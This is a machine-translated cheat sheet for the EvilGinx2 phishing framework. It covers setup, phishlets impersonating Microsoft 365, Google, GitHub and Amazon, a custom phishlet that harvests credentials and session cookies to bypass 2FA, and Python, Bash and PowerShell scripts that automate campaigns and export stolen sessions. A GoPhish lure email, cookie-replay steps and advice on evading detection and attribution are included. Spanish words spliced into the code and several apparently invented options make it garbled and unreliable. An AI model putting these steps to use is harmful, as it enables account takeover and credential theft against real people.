EvilGinx2 phishing Framework hoja de trucos
Overview
EvilGinx2 is a man-in-the-middle attack framework designed for advanced phishing campaigns. It acts as a reverse proxy between the objetivo website and the victim, allowing attackers to capture credenciales, sesión cookies, and bypass two-factor autenticación (2FA). EvilGinx2 is particularly effective against modern autenticación mechanisms and provides real-time phishing capabilities.
⚠️ Warning: This tool is intended for authorized pruebas de penetración and equipo rojo exercises only. Ensure you have proper autorización before using against any objetivo.
instalación
Prerequisites
# Install Go 1.19+ and Git
sudo apt update
sudo apt install -y golang-go git
# Verify Go instalación
go version
# Set Go environment variables
expuerto GOPATH=$HOME/go
expuerto PATH=$PATH:$GOPATH/bin
instalación from GitHub
# Clone EvilGinx2 repository
git clone https://github.com/kgretzky/evilginx2.git
cd evilginx2
# Build EvilGinx2
make
# Install to system path
sudo make install
# Or run directly
./bin/evilginx
Docker instalación
# Clone repository
git clone https://github.com/kgretzky/evilginx2.git
cd evilginx2
# Build Docker image
docker build -t evilginx2 .
# Run EvilGinx2 container
docker run -it --rm -p 443:443 -p 80:80 -p 53:53/udp evilginx2
# Run with persistent data
docker run -it --rm -p 443:443 -p 80:80 -p 53:53/udp -v $(pwd)/data:/app/data evilginx2
Manual instalación
# Download latest release
wget https://github.com/kgretzky/evilginx2/releases/latest/download/evilginx-linux-amd64.tar.gz
# Extract and install
tar -xzf evilginx-linux-amd64.tar.gz
sudo mv evilginx /usr/local/bin/
sudo chmod +x /usr/local/bin/evilginx
Basic configuración
Initial Setup
# Start EvilGinx2
sudo evilginx
# Set domain for phishing
config domain evil.com
# Set external IP address
config ip 192.168.1.100
# Enable developer mode (for testing)
config dev true
# Set redirect URL for successful phishing
config redirect_url https://www.google.com
SSL certificado configuración
# Generate Let's Encrypt certificados (requires valid domain)
config domain phishing.ejemplo.com
config ip 1.2.3.4
certs
# Use custom certificados
config cert_path /path/to/cert.pem
config clave_path /path/to/clave.pem
# Self-signed certificados (for testing)
config self_sign true
DNS configuración
# Configure DNS settings
config dns 8.8.8.8
# Enable DNS server
config dns_enabled true
# Set DNS puerto
config dns_puerto 53
# Add custom DNS records
dns A phishing.ejemplo.com 192.168.1.100
dns A login.phishing.ejemplo.com 192.168.1.100
Phishlets Management
Built-in Phishlets
# List available phishlets
phishlets
# Show phishlet details
phishlets show [phishlet_name]
# Enable phishlet
phishlets enable [phishlet_name]
# Disable phishlet
phishlets disable [phishlet_name]
# Get phishlet hostname
phishlets hostname [phishlet_name] [hostname]
Popular Phishlets
# Microsoft Office 365
phishlets enable o365
phishlets hostname o365 login.microsoftonline.evil.com
# Google
phishlets enable google
phishlets hostname google accounts.google.evil.com
# GitHub
phishlets enable github
phishlets hostname github github.evil.com
# LinkedIn
phishlets enable linkedin
phishlets hostname linkedin www.linkedin.evil.com
# Amazon
phishlets enable amazon
phishlets hostname amazon signin.aws.amazon.evil.com
Custom Phishlet Creation
# ejemplo phishlet configuración (custom.yaml)
name: 'custom'
author: '@attacker'
min_ver: '2.3.0'
proxy_hosts:
- \\\\{phish_sub: 'login', orig_sub: 'login', domain: 'objetivo.com', sesión: true, is_landing: true\\\\}
sub_filters:
- \\\\{triggers_on: 'login.objetivo.com', orig_sub: 'login', domain: 'objetivo.com', search: 'objetivo.com', replace: 'login.objetivo.evil.com', mimes: ['text/html', 'application/json']\\\\}
auth_tokens:
- domain: '.objetivo.com'
claves: ['sesión_token', 'auth_cookie']
auth_urls:
- '/login'
- '/authenticate'
credenciales:
nombre de usuario:
clave: 'nombre de usuario'
search: '(.*)'
type: 'post'
contraseña:
clave: 'contraseña'
search: '(.*)'
type: 'post'
login:
domain: 'objetivo.com'
path: '/login'
Loading Custom Phishlets
# Copy phishlet to phishlets directory
cp custom.yaml ~/.evilginx/phishlets/
# Reload phishlets
phishlets
# Enable custom phishlet
phishlets enable custom
phishlets hostname custom login.objetivo.evil.com
Lures and Campaign Management
Creating Lures
# Create new lure
lures create [phishlet_name]
# List all lures
lures
# Get lure details
lures get-url [lure_id]
# Delete lure
lures delete [lure_id]
# Edit lure
lures edit [lure_id] redirect_url https://legitimate-site.com
Lure configuración opcións
# Set redirect URL
lures edit [lure_id] redirect_url https://www.google.com
# Set user agent filter
lures edit [lure_id] ua_filter "Mozilla/5.0*"
# Set IP filter
lures edit [lure_id] ip_filter "192.168.1.0/24"
# Set custom parámetros
lures edit [lure_id] params "utm_source=email&utm;_campaign=test"
# Enable/disable lure
lures edit [lure_id] enabled true
lures edit [lure_id] enabled false
Advanced Lure Features
# Set custom landing page
lures edit [lure_id] landing_path "/custom-login"
# Set sesión timeout
lures edit [lure_id] sesión_timeout 3600
# Set maximum visits
lures edit [lure_id] max_visits 100
# Set geographic restrictions
lures edit [lure_id] geo_filter "US,CA,GB"
# Set time-based restrictions
lures edit [lure_id] time_filter "09:00-17:00"
sesión Management
Viewing sesións
# List all captured sesións
sesións
# Show sesión details
sesións [sesión_id]
# Expuerto sesión data
sesións expuerto [sesión_id] /path/to/expuerto.json
# Delete sesión
sesións delete [sesión_id]
# Clear all sesións
sesións clear
sesión Data Analysis
# View captured credenciales
sesións [sesión_id] creds
# View captured cookies
sesións [sesión_id] cookies
# View sesión timeline
sesións [sesión_id] timeline
# Expuerto cookies for browser impuerto
sesións [sesión_id] expuerto-cookies /path/to/cookies.txt
Real-time sesión Monitoring
# Enable real-time notifications
config notifications true
# Set notification webhook
config webhook_url https://your-server.com/webhook
# Monitor sesións in real-time
tail -f ~/.evilginx/logs/evilginx.log
# Custom monitoring script
watch -n 5 'evilginx -c "sesións"|tail -10'
Advanced Features
Traffic Manipulation
# Custom JavaScript injection
config js_inject true
config js_file /path/to/custom.js
# Custom CSS injection
config css_inject true
config css_file /path/to/custom.css
# Content replacement rules
config replace_rules /path/to/rules.json
# Header manipulation
config custom_headers /path/to/headers.json
Evasion Techniques
# Enable anti-detection features
config anti_detect true
# Randomize response timing
config timing_random true
# Enable CAPTCHA bypass
config captcha_bypass true
# Custom error pages
config error_pages /path/to/error_pages/
# Geofencing
config geo_block "CN,RU,KP"
# User-Agent filtering
config ua_block "bot,crawler,scanner"
Integration Features
# Webhook notifications
config webhook_enabled true
config webhook_url https://your-server.com/notifications
config webhook_secret your_secret_clave
# Slack integration
config slack_webhook https://hooks.slack.com/servicios/YOUR/SLACK/WEBHOOK
# Email notifications
config smtp_server smtp.gmail.com:587
config smtp_nombre de usuario your_email@gmail.com
config smtp_contraseña your_app_contraseña
config notification_email admin@your-domain.com
Automation and Scripting
Python Automation Script
#!/usr/bin/env python3
# EvilGinx2 automation script
impuerto subproceso
impuerto json
impuerto time
impuerto requests
from datetime impuerto datetime
class EvilGinxAutomation:
def __init__(self, domain, ip_address):
self.domain = domain
self.ip_address = ip_address
self.webhook_url = None
def setup_evilginx(self):
"""Initial EvilGinx2 setup"""
comandos = [
f"config domain \\\\{self.domain\\\\}",
f"config ip \\\\{self.ip_address\\\\}",
"config dev false",
"config redirect_url https://www.google.com",
"certs"
]
for cmd in comandos:
self.execute_comando(cmd)
time.sleep(2)
def execute_comando(self, comando):
"""Execute EvilGinx2 comando"""
try:
result = subproceso.run([
"evilginx", "-c", comando
], capture_output=True, text=True, timeout=30)
return result.stdout
except subproceso.TimeoutExpired:
return "comando timed out"
except Exception as e:
return f"Error: \\\\{str(e)\\\\}"
def setup_phishlet(self, phishlet_name, hostname):
"""Setup and enable phishlet"""
comandos = [
f"phishlets enable \\\\{phishlet_name\\\\}",
f"phishlets hostname \\\\{phishlet_name\\\\} \\\\{hostname\\\\}"
]
for cmd in comandos:
print(f"[+] Executing: \\\\{cmd\\\\}")
result = self.execute_comando(cmd)
time.sleep(1)
return True
def create_lure(self, phishlet_name, redirect_url=None):
"""Create phishing lure"""
cmd = f"lures create \\\\{phishlet_name\\\\}"
result = self.execute_comando(cmd)
# Extract lure ID from result
lure_id = self.extract_lure_id(result)
if redirect_url and lure_id:
self.execute_comando(f"lures edit \\\\{lure_id\\\\} redirect_url \\\\{redirect_url\\\\}")
return lure_id
def extract_lure_id(self, output):
"""Extract lure ID from comando output"""
# Parse output to extract lure ID
# Implementation depends on EvilGinx2 output format
lines = output.split('\n')
for line in lines:
if 'lure' in line.lower() and 'id' in line.lower():
# Extract ID using regex or string parsing
impuerto re
match = re.search(r'id:\s*(\d+)', line)
if match:
return match.group(1)
return None
def get_lure_url(self, lure_id):
"""Get phishing URL for lure"""
result = self.execute_comando(f"lures get-url \\\\{lure_id\\\\}")
# Parse URL from result
lines = result.split('\n')
for line in lines:
if 'http' in line:
return line.strip()
return None
def monitor_sesións(self):
"""Monitor captured sesións"""
while True:
result = self.execute_comando("sesións")
sesións = self.parse_sesións(result)
for sesión in sesións:
if sesión.get('new', False):
self.handle_new_sesión(sesión)
time.sleep(10)
def parse_sesións(self, output):
"""Parse sesións from comando output"""
# Implementation depends on EvilGinx2 output format
sesións = []
lines = output.split('\n')
for line in lines:
if 'sesión' in line.lower():
# Parse sesión data
sesión_data = \\\\{
'id': 'extracted_id',
'timestamp': datetime.now(),
'new': True # Logic to determine if sesión is new
\\\\}
sesións.append(sesión_data)
return sesións
def handle_new_sesión(self, sesión):
"""Handle new captured sesión"""
print(f"[+] New sesión captured: \\\\{sesión['id']\\\\}")
# Get sesión details
sesión_details = self.execute_comando(f"sesións \\\\{sesión['id']\\\\}")
# Send notification
if self.webhook_url:
self.send_webhook_notification(sesión, sesión_details)
# Expuerto sesión data
self.expuerto_sesión(sesión['id'])
def send_webhook_notification(self, sesión, details):
"""Send webhook notification for new sesión"""
payload = \\\\{
'sesión_id': sesión['id'],
'timestamp': sesión['timestamp'].isoformat(),
'details': details
\\\\}
try:
response = requests.post(self.webhook_url, json=payload, timeout=10)
if response.status_code == 200:
print("[+] Webhook notification sent")
else:
print(f"[-] Webhook failed: \\\\{response.status_code\\\\}")
except Exception as e:
print(f"[-] Webhook error: \\\\{str(e)\\\\}")
def expuerto_sesión(self, sesión_id):
"""Expuerto sesión data"""
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
expuerto_path = f"/tmp/sesión_\\\\{sesión_id\\\\}_\\\\{timestamp\\\\}.json"
self.execute_comando(f"sesións expuerto \\\\{sesión_id\\\\} \\\\{expuerto_path\\\\}")
print(f"[+] sesión expuertoed to: \\\\{expuerto_path\\\\}")
def setup_campaign(self, campaign_config):
"""Setup complete phishing campaign"""
print("[+] Setting up EvilGinx2 campaign...")
# Initial setup
self.setup_evilginx()
# Setup phishlets
for phishlet in campaign_config.get('phishlets', []):
self.setup_phishlet(phishlet['name'], phishlet['hostname'])
# Create lures
for lure_config in phishlet.get('lures', []):
lure_id = self.create_lure(phishlet['name'], lure_config.get('redirect_url'))
if lure_id:
lure_url = self.get_lure_url(lure_id)
print(f"[+] Lure created: \\\\{lure_url\\\\}")
print("[+] Campaign setup complete")
# uso ejemplo
def main():
# Campaign configuración
campaign_config = \\\\{
'phishlets': [
\\\\{
'name': 'o365',
'hostname': 'login.microsoftonline.evil.com',
'lures': [
\\\\{'redirect_url': 'https://office.com'\\\\},
\\\\{'redirect_url': 'https://outlook.com'\\\\}
]
\\\\},
\\\\{
'name': 'google',
'hostname': 'accounts.google.evil.com',
'lures': [
\\\\{'redirect_url': 'https://gmail.com'\\\\}
]
\\\\}
]
\\\\}
# Initialize automation
automation = EvilGinxAutomation("evil.com", "192.168.1.100")
automation.webhook_url = "https://your-server.com/webhook"
# Setup campaign
automation.setup_campaign(campaign_config)
# Start monitoring
automation.monitor_sesións()
if __name__ == "__main__":
main()
Bash Automation Script
#!/bin/bash
# EvilGinx2 bash automation script
DOMAIN="evil.com"
IP_ADDRESS="192.168.1.100"
PHISHLET="o365"
hostNAME="login.microsoftonline.evil.com"
# Function to execute EvilGinx2 comandos
execute_evilginx_comando() \\\\{
local comando="$1"
echo "[+] Executing: $comando"
evilginx -c "$comando"
sleep 2
\\\\}
# Initial setup
echo "[+] Setting up EvilGinx2..."
execute_evilginx_comando "config domain $DOMAIN"
execute_evilginx_comando "config ip $IP_ADDRESS"
execute_evilginx_comando "config dev false"
execute_evilginx_comando "config redirect_url https://www.google.com"
execute_evilginx_comando "certs"
# Setup phishlet
echo "[+] Setting up phishlet: $PHISHLET"
execute_evilginx_comando "phishlets enable $PHISHLET"
execute_evilginx_comando "phishlets hostname $PHISHLET $hostNAME"
# Create lure
echo "[+] Creating lure..."
LURE_OUTPUT=$(evilginx -c "lures create $PHISHLET")
LURE_ID=$(echo "$LURE_OUTPUT"|grep -oP 'id:\s*\K\d+')
if [ -n "$LURE_ID" ]; then
echo "[+] Lure created with ID: $LURE_ID"
# Configure lure
execute_evilginx_comando "lures edit $LURE_ID redirect_url https://office.com"
# Get lure URL
LURE_URL=$(evilginx -c "lures get-url $LURE_ID"|grep -oP 'https?://[^\s]+')
echo "[+] phishing URL: $LURE_URL"
else
echo "[-] Failed to create lure"
exit 1
fi
# Monitor sesións
echo "[+] Starting sesión monitoring..."
while true; do
sesiónS=$(evilginx -c "sesións"|grep -c "sesión")
if [ "$sesiónS" -gt 0 ]; then
echo "[+] $sesiónS sesión(s) captured"
# Expuerto latest sesión
| LATEST_sesión=$(evilginx -c "sesións" | tail -1 | awk '\\\\{print $1\\\\}') |
if [ -n "$LATEST_sesión" ]; then
TIMESTAMP=$(date +"%Y%m%d_%H%M%S")
evilginx -c "sesións expuerto $LATEST_sesión /tmp/sesión_$\\\\{LATEST_sesión\\\\}_$\\\\{TIMESTAMP\\\\}.json"
echo "[+] sesión expuertoed: /tmp/sesión_$\\\\{LATEST_sesión\\\\}_$\\\\{TIMESTAMP\\\\}.json"
fi
fi
sleep 30
done
PowerShell Automation
# EvilGinx2 PowerShell automation script
function Invoke-EvilGinxAutomation \\\\{
param(
[string]$Domain = "evil.com",
[string]$IPAddress = "192.168.1.100",
[string]$Phishlet = "o365",
[string]$hostname = "login.microsoftonline.evil.com"
)
function Execute-EvilGinxcomando \\\\{
param([string]$comando)
Write-host "[+] Executing: $comando"
try \\\\{
$result = & evilginx -c $comando 2>&1
Start-Sleep -Seconds 2
return $result
\\\\}
catch \\\\{
Write-Warning "Failed to execute comando: $comando"
return $null
\\\\}
\\\\}
# Initial setup
Write-host "[+] Setting up EvilGinx2..."
Execute-EvilGinxcomando "config domain $Domain"
Execute-EvilGinxcomando "config ip $IPAddress"
Execute-EvilGinxcomando "config dev false"
Execute-EvilGinxcomando "config redirect_url https://www.google.com"
Execute-EvilGinxcomando "certs"
# Setup phishlet
Write-host "[+] Setting up phishlet: $Phishlet"
Execute-EvilGinxcomando "phishlets enable $Phishlet"
Execute-EvilGinxcomando "phishlets hostname $Phishlet $hostname"
# Create lure
Write-host "[+] Creating lure..."
$lureOutput = Execute-EvilGinxcomando "lures create $Phishlet"
if ($lureOutput -match 'id:\s*(\d+)') \\\\{
$lureId = $matches[1]
Write-host "[+] Lure created with ID: $lureId"
# Configure lure
Execute-EvilGinxcomando "lures edit $lureId redirect_url https://office.com"
# Get lure URL
$lureUrlOutput = Execute-EvilGinxcomando "lures get-url $lureId"
if ($lureUrlOutput -match '(https?://[^\s]+)') \\\\{
$lureUrl = $matches[1]
Write-host "[+] phishing URL: $lureUrl"
\\\\}
\\\\}
else \\\\{
Write-Error "Failed to create lure"
return
\\\\}
# Monitor sesións
Write-host "[+] Starting sesión monitoring..."
while ($true) \\\\{
$sesiónsOutput = Execute-EvilGinxcomando "sesións"
$sesiónCount = ($sesiónsOutput|Select-String "sesión").Count
if ($sesiónCount -gt 0) \\\\{
Write-host "[+] $sesiónCount sesión(s) captured"
# Expuerto latest sesión
$sesións = $sesiónsOutput -split "`n"|Where-Object \\{ $_ -match "sesión" \\}
if ($sesións.Count -gt 0) \\{
$latestsesión = ($sesións[-1] -split '\s+')[0]
$timestamp = Get-Date -Format "yyyyMMdd_HHmmss"
$expuertoPath = "/tmp/sesión_$\\{latestsesión\\}_$\\{timestamp\\}.json"
Execute-EvilGinxcomando "sesións expuerto $latestsesión $expuertoPath"
Write-host "[+] sesión expuertoed: $expuertoPath"
\\}
\\}
Start-Sleep -Seconds 30
\\}
\\}
# Execute automation
Invoke-EvilGinxAutomation -Domain "evil.com" -IPAddress "192.168.1.100"
Integration with Other Tools
Metasploit Integration
# Use EvilGinx2 for credential harvesting, pivot to Metasploit
# After capturing credenciales, use them in Metasploit modules
# ejemplo: Use captured O365 credenciales
use auxiliary/scanner/http/office365_login
set nombre de usuario captured_nombre de usuario@company.com
set contraseña captured_contraseña
set RhostS company-mail.outlook.com
run
# Use captured sesión cookies in browser automation
use auxiliary/scanner/http/cookie_replay
set COOKIE "captured_sesión_cookie"
set RhostS objetivo.com
run
ingeniería social Toolkit Integration
# Combine with SET for comprehensive campaigns
# Use EvilGinx2 for credential harvesting
# Use SET for payload delivery
# Generate SET payload
setoolkit
# Select Social-Engineering Attacks
# Select Website Attack Vectors
# Select Credential Harvester Attack Method
# Use custom EvilGinx2 URL as redirect
GoPhish Integration
# Use GoPhish for email delivery
# Use EvilGinx2 for credential harvesting
# GoPhish campaign configuración
\\{
"name": "O365 Campaign",
"template": \\{
"name": "O365 Login Required",
"subject": "Action Required: Verify Your Account",
"html": "<a href='\\{\\{.URL\\}\\}'>Click here to verify</a>"
\\},
"url": "https://login.microsoftonline.evil.com/lure_url"
\\}
Operational Security
Domain and Infrastructure
# Use legitimate-looking domains
# Register domains with privacy protection
# Use cloud hosting providers
# Implement CDN for traffic distribution
# ejemplo domain registration
# Register: microsoftonline-security.com
# Setup: login.microsoftonline-security.com
# SSL: Let's Encrypt or commercial certificado
Traffic Obfuscation
# Enable anti-detection features
config anti_detect true
# Use legitimate SSL certificados
config cert_path /path/to/legitimate/cert.pem
# Implement geographic restrictions
config geo_block "high_risk_countries"
# Use realistic timing delays
config timing_random true
config min_delay 500
config max_delay 2000
Log Management
# Configure secure logging
config log_file /var/log/evilginx/access.log
config log_level info
# Implement log rotation
logrotate /etc/logrotate.d/evilginx
# Secure log storage
# Encrypt logs at rest
# Use remote log aggregation
# Implement log retention policies
Attribution Prevention
# Use VPS with cryptocurrency payment
# Implement proxy chains
# Use Tor for administrative access
# Regularly rotate infrastructure
# ejemplo infrastructure rotation
# Week 1: VPS Provider A, Domain Set 1
# Week 2: VPS Provider B, Domain Set 2
# Week 3: VPS Provider C, Domain Set 3
solución de problemas
Common Issues
# certificado issues
# Check domain DNS configuración
# Verify Let's Encrypt rate limits
# Test certificado validity
# DNS resolution problems
# Check DNS server configuración
# Verify domain propagation
# Test with different DNS resolvers
# Phishlet not working
# Check phishlet sintaxis
# Verify objetivo website changes
# Test with different browsers
Debug Mode
# Enable debug logging
config debug true
config log_level debug
# Test phishlet functionality
phishlets test [phishlet_name]
# Check network connectivity
curl -I https://your-phishing-domain.com
# Verify SSL configuración
openssl s_client -connect your-domain.com:443
Performance Optimization
# Optimize for high traffic
config max_conexións 1000
config timeout 30
# Enable caching
config cache_enabled true
config cache_size 100MB
# Monitor resource uso
htop
iotop
netstat -tulpn
Best Practices
Campaign Planning
- objetivo research: Understand objetivo organization and users
- Domain selection: Choose convincing domain names
- Infrastructure setup: Use secure and anonymous hosting
- Testing: Thoroughly test phishing pages before deployment
- Monitoring: Implement real-time sesión monitoring
Legal and Ethical Considerations
# Authorized testing only
# Obtain proper written autorización
# Follow responsible disclosure
# Protect captured data
# Document all activities
# ejemplo autorización checklist
# [ ] Written pruebas de penetración agreement
# [ ] Scope clearly defined
# [ ] Data handling procedures established
# [ ] respuesta a incidentes plan in place
# [ ] Legal review completed
Data Protection
# Encrypt captured data
# Implement secure data storage
# Use secure communication channels
# Regular data purging
# Control de Acceso and auditing
# ejemplo data cifrado
gpg --cipher-algo AES256 --compress-algo 1 --symmetric --output sesión_data.gpg sesión_data.json
Resources
- EvilGinx2 GitHub Repository
- EvilGinx2 documentación
- Phishlet Development Guide
- OWASP phishing Guide
- Anti-phishing Working Group
This hoja de trucos provides a comprehensive reference for using EvilGinx2 phishing framework. Always ensure you have proper autorización before conducting phishing simulations or pruebas de penetración.